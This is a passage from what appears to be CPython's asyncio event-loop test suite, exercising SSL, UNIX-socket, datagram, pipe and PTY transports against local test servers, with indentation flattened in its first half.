peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
    """A TLS UNIX-socket server accepts a TLS client and receives data."""
    proto = MyProto(loop=self.loop)
    server, path = self._make_ssl_unix_server(
        lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
    # empty server_hostname disables hostname checking for the client
    f_c = self.loop.create_unix_connection(
        MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
        server_hostname='')
    client, pr = self.loop.run_until_complete(f_c)
    client.write(b'xxx')
    self.loop.run_until_complete(proto.connected)
    self.assertEqual('CONNECTED', proto.state)
    test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
    self.assertEqual(3, proto.nbytes)
    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
    # the client socket must be closed after to avoid ECONNRESET upon
    # recv()/send() on the serving socket
    client.close()
    # stop serving
    server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
    """A client with CERT_REQUIRED but no CA must fail the handshake."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # no CA loaded
    f_c = self.loop.create_connection(MyProto, host, port,
                                      ssl=sslcontext_client)
    with mock.patch.object(self.loop, 'call_exception_handler'):
        with test_utils.disable_logger():
            with self.assertRaisesRegex(ssl.SSLError,
                                        '(?i)certificate.verify.failed'):
                self.loop.run_until_complete(f_c)
        # execute the loop to log the connection error
        test_utils.run_briefly(self.loop)
    # close connection
    self.assertIsNone(proto.transport)
    server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
    """Same as test_create_server_ssl_verify_failed, over a UNIX socket."""
    proto = MyProto(loop=self.loop)
    server, path = self._make_ssl_unix_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # no CA loaded
    f_c = self.loop.create_unix_connection(MyProto, path,
                                           ssl=sslcontext_client,
                                           server_hostname='invalid')
    with mock.patch.object(self.loop, 'call_exception_handler'):
        with test_utils.disable_logger():
            with self.assertRaisesRegex(ssl.SSLError,
                                        '(?i)certificate.verify.failed'):
                self.loop.run_until_complete(f_c)
        # execute the loop to log the connection error
        test_utils.run_briefly(self.loop)
    # close connection
    self.assertIsNone(proto.transport)
    server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
    """Hostname checking must reject a cert not valid for 127.0.0.1."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    sslcontext_client.load_verify_locations(
        cafile=test_utils.SIGNING_CA)
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # incorrect server_hostname
    f_c = self.loop.create_connection(MyProto, host, port,
                                      ssl=sslcontext_client)
    with mock.patch.object(self.loop, 'call_exception_handler'):
        with test_utils.disable_logger():
            with self.assertRaisesRegex(
                    ssl.CertificateError,
                    "IP address mismatch, certificate is not valid for "
                    "'127.0.0.1'"):
                self.loop.run_until_complete(f_c)
    # close connection
    # transport is None because TLS ALERT aborted the handshake
    self.assertIsNone(proto.transport)
    server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
    """A fully verified TLS connection over a UNIX socket succeeds."""
    proto = MyProto(loop=self.loop)
    server, path = self._make_ssl_unix_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # Connection succeeds with correct CA and server hostname.
    f_c = self.loop.create_unix_connection(MyProto, path,
                                           ssl=sslcontext_client,
                                           server_hostname='localhost')
    client, pr = self.loop.run_until_complete(f_c)
    # close connection
    proto.transport.close()
    client.close()
    server.close()
    self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
    """A fully verified TLS TCP connection succeeds and exposes peercert."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # Connection succeeds with correct CA and server hostname.
    f_c = self.loop.create_connection(MyProto, host, port,
                                      ssl=sslcontext_client,
                                      server_hostname='localhost')
    client, pr = self.loop.run_until_complete(f_c)
    # extra info is available
    self.check_ssl_extra_info(client, peername=(host, port),
                              peercert=test_utils.PEERCERT)
    # close connection
    proto.transport.close()
    client.close()
    server.close()
    self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
    """create_server(sock=...) must serve on the pre-created socket."""
    proto = self.loop.create_future()

    class TestMyProto(MyProto):
        def connection_made(self, transport):
            super().connection_made(transport)
            proto.set_result(self)

    sock_ob = socket.create_server(('0.0.0.0', 0))
    f = self.loop.create_server(TestMyProto, sock=sock_ob)
    server = self.loop.run_until_complete(f)
    sock = server.sockets[0]
    # the server must reuse the very same socket object (same fd)
    self.assertEqual(sock.fileno(), sock_ob.fileno())
    host, port = sock.getsockname()
    self.assertEqual(host, '0.0.0.0')
    client = socket.socket()
    client.connect(('127.0.0.1', port))
    client.send(b'xxx')
    client.close()
    server.close()
def test_create_server_addr_in_use(self):
    """Binding a second server to an occupied port raises EADDRINUSE."""
    sock_ob = socket.create_server(('0.0.0.0', 0))
    f = self.loop.create_server(MyProto, sock=sock_ob)
    server = self.loop.run_until_complete(f)
    sock = server.sockets[0]
    host, port = sock.getsockname()
    # second bind to the exact same address must fail
    f = self.loop.create_server(MyProto, host=host, port=port)
    with self.assertRaises(OSError) as cm:
        self.loop.run_until_complete(f)
    self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
    server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
    """A server bound with host=None accepts both IPv4 and IPv6 clients."""
    f_proto = self.loop.create_future()

    class TestMyProto(MyProto):
        def connection_made(self, transport):
            super().connection_made(transport)
            f_proto.set_result(self)

    # find_unused_port() is racy: retry (up to 5 times) on EADDRINUSE
    try_count = 0
    while True:
        try:
            port = support.find_unused_port()
            f = self.loop.create_server(TestMyProto, host=None, port=port)
            server = self.loop.run_until_complete(f)
        except OSError as ex:
            if ex.errno == errno.EADDRINUSE:
                try_count += 1
                self.assertGreaterEqual(5, try_count)
                continue
            else:
                raise
        else:
            break
    # IPv4 client
    client = socket.socket()
    client.connect(('127.0.0.1', port))
    client.send(b'xxx')
    proto = self.loop.run_until_complete(f_proto)
    proto.transport.close()
    client.close()
    # IPv6 client against the same server
    f_proto = self.loop.create_future()
    client = socket.socket(socket.AF_INET6)
    client.connect(('::1', port))
    client.send(b'xxx')
    proto = self.loop.run_until_complete(f_proto)
    proto.transport.close()
    client.close()
    server.close()
def test_server_close(self):
    """After server.close(), new connections must be refused."""
    f = self.loop.create_server(MyProto, '0.0.0.0', 0)
    server = self.loop.run_until_complete(f)
    sock = server.sockets[0]
    host, port = sock.getsockname()
    client = socket.socket()
    client.connect(('127.0.0.1', port))
    client.send(b'xxx')
    client.close()
    server.close()
    client = socket.socket()
    self.assertRaises(
        ConnectionRefusedError, client.connect, ('127.0.0.1', port))
    client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
    """Round-trip a datagram between a server and a client endpoint.

    The server echoes every datagram back with a b'resp:' prefix.
    """
    class TestMyDatagramProto(MyDatagramProto):
        # named 'inner_self' so the enclosing test case's 'self' stays
        # visible inside this method
        def __init__(inner_self):
            super().__init__(loop=self.loop)

        def datagram_received(self, data, addr):
            super().datagram_received(data, addr)
            self.transport.sendto(b'resp:'+data, addr)

    coro = self.loop.create_datagram_endpoint(
        TestMyDatagramProto, local_addr=local_addr, family=family)
    s_transport, server = self.loop.run_until_complete(coro)
    sockname = s_transport.get_extra_info('sockname')
    host, port = socket.getnameinfo(
        sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
    self.assertIsInstance(s_transport, asyncio.Transport)
    self.assertIsInstance(server, TestMyDatagramProto)
    self.assertEqual('INITIALIZED', server.state)
    self.assertIs(server.transport, s_transport)

    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop),
        remote_addr=(host, port))
    transport, client = self.loop.run_until_complete(coro)
    self.assertIsInstance(transport, asyncio.Transport)
    self.assertIsInstance(client, MyDatagramProto)
    self.assertEqual('INITIALIZED', client.state)
    self.assertIs(client.transport, transport)

    transport.sendto(b'xxx')
    test_utils.run_until(self.loop, lambda: server.nbytes)
    self.assertEqual(3, server.nbytes)
    test_utils.run_until(self.loop, lambda: client.nbytes)
    # received: b'resp:xxx' is 8 bytes
    self.assertEqual(8, client.nbytes)
    # extra info is available
    self.assertIsNotNone(transport.get_extra_info('sockname'))
    # close connection
    transport.close()
    self.loop.run_until_complete(client.done)
    self.assertEqual('CLOSED', client.state)
    server.transport.close()
def test_create_datagram_endpoint(self):
    """Datagram endpoint round-trip over IPv4."""
    self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
    """Datagram endpoint round-trip over IPv6."""
    self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
    """create_datagram_endpoint(sock=...) must use the pre-bound socket.

    Tries each getaddrinfo() result until a UDP socket binds; fails the
    test if none can be created.
    """
    sock = None
    local_address = ('127.0.0.1', 0)
    infos = self.loop.run_until_complete(
        self.loop.getaddrinfo(
            *local_address, type=socket.SOCK_DGRAM))
    for family, type, proto, cname, address in infos:
        try:
            sock = socket.socket(family=family, type=type, proto=proto)
            sock.setblocking(False)
            sock.bind(address)
        # Bug fix: the original bare ``except:`` also swallowed
        # KeyboardInterrupt/SystemExit; socket creation and bind
        # failures are OSError.
        except OSError:
            pass
        else:
            break
    else:
        assert False, 'Can not create socket.'

    f = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop), sock=sock)
    tr, pr = self.loop.run_until_complete(f)
    self.assertIsInstance(tr, asyncio.Transport)
    self.assertIsInstance(pr, MyDatagramProto)
    tr.close()
    self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
    """Closing the loop must release its internal self-pipe sockets."""
    loop = self.create_event_loop()
    if not isinstance(loop, selector_events.BaseSelectorEventLoop):
        loop.close()
        self.skipTest('loop is not a BaseSelectorEventLoop')

    # one internal fd pair registered while the loop is open
    self.assertEqual(1, loop._internal_fds)
    loop.close()
    self.assertEqual(0, loop._internal_fds)
    self.assertIsNone(loop._csock)
    self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_read_pipe(self):
    """connect_read_pipe() delivers pipe data and EOF to the protocol."""
    proto = MyReadPipeProto(loop=self.loop)

    rpipe, wpipe = os.pipe()
    pipeobj = io.open(rpipe, 'rb', 1024)

    async def connect():
        t, p = await self.loop.connect_read_pipe(
            lambda: proto, pipeobj)
        self.assertIs(p, proto)
        self.assertIs(t, proto.transport)
        self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
        self.assertEqual(0, proto.nbytes)

    self.loop.run_until_complete(connect())

    os.write(wpipe, b'1')
    test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
    self.assertEqual(1, proto.nbytes)

    os.write(wpipe, b'2345')
    test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
    self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
    self.assertEqual(5, proto.nbytes)

    # closing the write end produces EOF on the read side
    os.close(wpipe)
    self.loop.run_until_complete(proto.done)
    self.assertEqual(
        ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
    """repr() of a pipe transport must not fail after the loop is closed."""
    # This test reproduces the issue #314 on GitHub
    loop = self.create_event_loop()
    read_proto = MyReadPipeProto(loop=loop)
    write_proto = MyWritePipeProto(loop=loop)

    rpipe, wpipe = os.pipe()
    rpipeobj = io.open(rpipe, 'rb', 1024)
    wpipeobj = io.open(wpipe, 'w', 1024)

    async def connect():
        read_transport, _ = await loop.connect_read_pipe(
            lambda: read_proto, rpipeobj)
        write_transport, _ = await loop.connect_write_pipe(
            lambda: write_proto, wpipeobj)
        return read_transport, write_transport

    # Run and close the loop without closing the transports
    read_transport, write_transport = loop.run_until_complete(connect())
    loop.close()

    # These 'repr' calls used to raise an AttributeError
    # See Issue #314 on GitHub
    self.assertIn('open', repr(read_transport))
    self.assertIn('open', repr(write_transport))

    # Clean up (avoid ResourceWarning)
    rpipeobj.close()
    wpipeobj.close()
    read_transport._pipe = None
    write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_read_pty_output(self):
    """connect_read_pipe() works on a PTY master and sees slave output."""
    proto = MyReadPipeProto(loop=self.loop)

    master, slave = os.openpty()
    master_read_obj = io.open(master, 'rb', 0)

    async def connect():
        t, p = await self.loop.connect_read_pipe(lambda: proto,
                                                 master_read_obj)
        self.assertIs(p, proto)
        self.assertIs(t, proto.transport)
        self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
        self.assertEqual(0, proto.nbytes)

    self.loop.run_until_complete(connect())

    os.write(slave, b'1')
    test_utils.run_until(self.loop, lambda: proto.nbytes)
    self.assertEqual(1, proto.nbytes)

    os.write(slave, b'2345')
    test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
    self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
    self.assertEqual(5, proto.nbytes)

    os.close(slave)
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual(
        ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_write_pipe(self):
    """connect_write_pipe() writes reach the read end of the pipe."""
    rpipe, wpipe = os.pipe()
    pipeobj = io.open(wpipe, 'wb', 1024)

    proto = MyWritePipeProto(loop=self.loop)
    connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
    transport, p = self.loop.run_until_complete(connect)
    self.assertIs(p, proto)
    self.assertIs(transport, proto.transport)
    self.assertEqual('CONNECTED', proto.state)

    transport.write(b'1')

    data = bytearray()

    def reader(data):
        # drain the read end of the pipe into 'data'
        chunk = os.read(rpipe, 1024)
        data += chunk
        return len(data)

    test_utils.run_until(self.loop, lambda: reader(data) >= 1)
    self.assertEqual(b'1', data)

    transport.write(b'2345')
    test_utils.run_until(self.loop, lambda: reader(data) >= 5)
    self.assertEqual(b'12345', data)
    self.assertEqual('CONNECTED', proto.state)

    os.close(rpipe)

    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))

    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
    """Closing the peer of a write pipe must disconnect the protocol."""
    rsock, wsock = socket.socketpair()
    rsock.setblocking(False)
    # detach() hands the fd over to the file object
    pipeobj = io.open(wsock.detach(), 'wb', 1024)

    proto = MyWritePipeProto(loop=self.loop)
    connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
    transport, p = self.loop.run_until_complete(connect)
    self.assertIs(p, proto)
    self.assertIs(transport, proto.transport)
    self.assertEqual('CONNECTED', proto.state)

    transport.write(b'1')
    data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
    self.assertEqual(b'1', data)

    rsock.close()

    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
    """connect_write_pipe() works on a PTY slave; master sees the data."""
    master, slave = os.openpty()
    slave_write_obj = io.open(slave, 'wb', 0)

    proto = MyWritePipeProto(loop=self.loop)
    connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
    transport, p = self.loop.run_until_complete(connect)
    self.assertIs(p, proto)
    self.assertIs(transport, proto.transport)
    self.assertEqual('CONNECTED', proto.state)

    transport.write(b'1')

    data = bytearray()

    def reader(data):
        # drain the PTY master into 'data'
        chunk = os.read(master, 1024)
        data += chunk
        return len(data)

    test_utils.run_until(self.loop, lambda: reader(data) >= 1,
                         timeout=10)
    self.assertEqual(b'1', data)

    transport.write(b'2345')
    test_utils.run_until(self.loop, lambda: reader(data) >= 5,
                         timeout=10)
    self.assertEqual(b'12345', data)
    self.assertEqual('CONNECTED', proto.state)

    os.close(master)

    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))

    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
    """Simultaneous read and write transports share one PTY correctly."""
    master, read_slave = os.openpty()
    write_slave = os.dup(read_slave)
    # raw mode: no echo/translation, so byte counts match exactly
    tty.setraw(read_slave)

    slave_read_obj = io.open(read_slave, 'rb', 0)
    read_proto = MyReadPipeProto(loop=self.loop)
    read_connect = self.loop.connect_read_pipe(lambda: read_proto,
                                               slave_read_obj)
    read_transport, p = self.loop.run_until_complete(read_connect)
    self.assertIs(p, read_proto)
    self.assertIs(read_transport, read_proto.transport)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual(0, read_proto.nbytes)

    slave_write_obj = io.open(write_slave, 'wb', 0)
    write_proto = MyWritePipeProto(loop=self.loop)
    write_connect = self.loop.connect_write_pipe(lambda: write_proto,
                                                 slave_write_obj)
    write_transport, p = self.loop.run_until_complete(write_connect)
    self.assertIs(p, write_proto)
    self.assertIs(write_transport, write_proto.transport)
